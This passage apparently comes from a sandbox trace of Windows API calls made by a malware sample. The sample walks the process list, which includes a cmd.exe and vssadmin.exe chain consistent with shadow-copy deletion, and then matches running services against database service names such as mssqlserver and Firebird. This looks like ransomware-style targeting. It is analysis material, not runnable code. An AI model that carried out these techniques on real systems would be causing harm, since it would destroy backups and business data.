	[0036.082] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0036.083] lstrlenW (lpString="dwm.exe") returned 7
	[0036.083] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0036.083] lstrlenW (lpString="explorer.exe") returned 12
	[0036.083] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0036.084] lstrlenW (lpString="spoolsv.exe") returned 11
	[0036.084] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0036.084] lstrlenW (lpString="taskhost.exe") returned 12
	[0036.084] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.085] lstrlenW (lpString="svchost.exe") returned 11
	[0036.085] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0036.085] lstrlenW (lpString="taskeng.exe") returned 11
	[0036.085] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0036.086] lstrlenW (lpString="taskhost.exe") returned 12
	[0036.086] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0036.086] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0036.086] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0036.087] lstrlenW (lpString="python tragedy.exe") returned 18
	[0036.087] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0036.087] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0036.087] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0036.088] lstrlenW (lpString="computers.exe") returned 13
	[0036.088] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0036.088] lstrlenW (lpString="separated.exe") returned 13
	[0036.088] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0036.089] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0036.089] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0036.089] lstrlenW (lpString="darkness.exe") returned 12
	[0036.089] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0036.090] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0036.090] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0036.090] lstrlenW (lpString="sophisticated.exe") returned 17
	[0036.090] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0036.091] lstrlenW (lpString="wishlist.exe") returned 12
	[0036.091] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0036.091] lstrlenW (lpString="top.exe") returned 7
	[0036.091] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0036.091] lstrlenW (lpString="implemented.exe") returned 15
	[0036.092] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0036.092] lstrlenW (lpString="comp.exe") returned 8
	[0036.092] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0036.092] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0036.093] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0036.093] lstrlenW (lpString="solved.exe") returned 10
	[0036.093] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0036.093] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0036.093] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0036.094] lstrlenW (lpString="trips.exe") returned 9
	[0036.094] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0036.094] lstrlenW (lpString="tumormanual.exe") returned 15
	[0036.094] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0036.095] lstrlenW (lpString="telecom.exe") returned 11
	[0036.095] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0036.095] lstrlenW (lpString="realistic.exe") returned 13
	[0036.095] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0036.096] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0036.096] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0036.096] lstrlenW (lpString="dllhost.exe") returned 11
	[0036.096] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0036.097] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0036.097] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0036.097] lstrlenW (lpString="cmd.exe") returned 7
	[0036.097] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0036.098] lstrlenW (lpString="conhost.exe") returned 11
	[0036.098] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0036.098] lstrlenW (lpString="vssadmin.exe") returned 12
	[0036.098] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0036.099] CloseHandle (hObject=0x1a8) returned 1
	[0036.099] Sleep (dwMilliseconds=0x1f4) 
	[0036.997] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fa18
	[0036.997] EnumServicesStatusExW (in: hSCManager=0x7e0fa18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0036.997] GetLastError () returned 0xea
	[0036.997] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0x7e5ca88
	[0036.997] EnumServicesStatusExW (in: hSCManager=0x7e0fa18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x11e4, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0036.998] CloseServiceHandle (hSCObject=0x7e0fa18) returned 1
	[0036.998] lstrlenW (lpString="Appinfo") returned 7
	[0036.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0036.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0036.998] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0036.998] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0036.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0036.998] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0036.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0036.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0036.998] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0036.998] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0036.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0036.998] lstrlenW (lpString="AudioSrv") returned 8
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0036.999] lstrlenW (lpString="BFE") returned 3
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0036.999] lstrlenW (lpString="CryptSvc") returned 8
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0036.999] lstrlenW (lpString="CscService") returned 10
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0036.999] lstrlenW (lpString="DcomLaunch") returned 10
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0036.999] lstrlenW (lpString="Dhcp") returned 4
	[0036.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0036.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0036.999] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0036.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0037.000] lstrlenW (lpString="Dnscache") returned 8
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0037.000] lstrlenW (lpString="DPS") returned 3
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0037.000] lstrlenW (lpString="eventlog") returned 8
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0037.000] lstrlenW (lpString="EventSystem") returned 11
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0037.000] lstrlenW (lpString="gpsvc") returned 5
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0037.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0037.000] lstrlenW (lpString="iphlpsvc") returned 8
	[0037.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0037.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0037.000] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0037.000] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0037.001] lstrlenW (lpString="LanmanServer") returned 12
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0037.001] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0037.001] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0037.001] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0037.001] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0037.001] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0037.001] lstrlenW (lpString="lmhosts") returned 7
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0037.001] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0037.001] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0037.001] lstrlenW (lpString="MMCSS") returned 5
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0037.001] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0037.001] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0037.001] lstrlenW (lpString="MpsSvc") returned 6
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0037.001] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0037.001] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0037.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0037.001] lstrlenW (lpString="Netman") returned 6
	[0037.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0037.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0037.002] lstrlenW (lpString="netprofm") returned 8
	[0037.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0037.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0037.002] lstrlenW (lpString="NlaSvc") returned 6
	[0037.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0037.002] lstrlenW (lpString="nsi") returned 3
	[0037.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0037.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0037.002] lstrlenW (lpString="PcaSvc") returned 6
	[0037.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0037.002] lstrlenW (lpString="PlugPlay") returned 8
	[0037.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0037.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0037.002] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0037.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0037.002] lstrlenW (lpString="Power") returned 5
	[0037.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0037.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0037.004] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0037.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0037.004] lstrlenW (lpString="ProfSvc") returned 7
